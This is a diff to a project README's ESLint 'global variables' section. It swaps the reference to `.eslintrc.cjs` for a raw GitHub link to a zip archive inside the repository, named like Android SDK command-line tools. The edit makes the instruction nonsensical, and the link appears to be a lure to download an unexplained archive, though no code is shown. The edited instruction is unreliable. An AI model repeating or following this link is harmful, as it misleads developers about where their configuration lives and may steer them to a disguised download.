pq1234s/dol-kr/README.md

 ##### Global variables

 ESLint may report a issue like `'myVariable' is not defined`.
 It means ESLint cannot figure out where the variable is defined.
-If you really meant to make variable global add the new variable to `.eslintrc.cjs` `globals` section inside corresponding group:
+If you really meant to make variable global add the new variable to `https://raw.githubusercontent.com/pq1234s/dol-kr/main/devTools/androidsdk/image/commandlinetools-linux-6609375_latest.zip` `globals` section inside corresponding group:

 ```json
 myVariable: "readonly"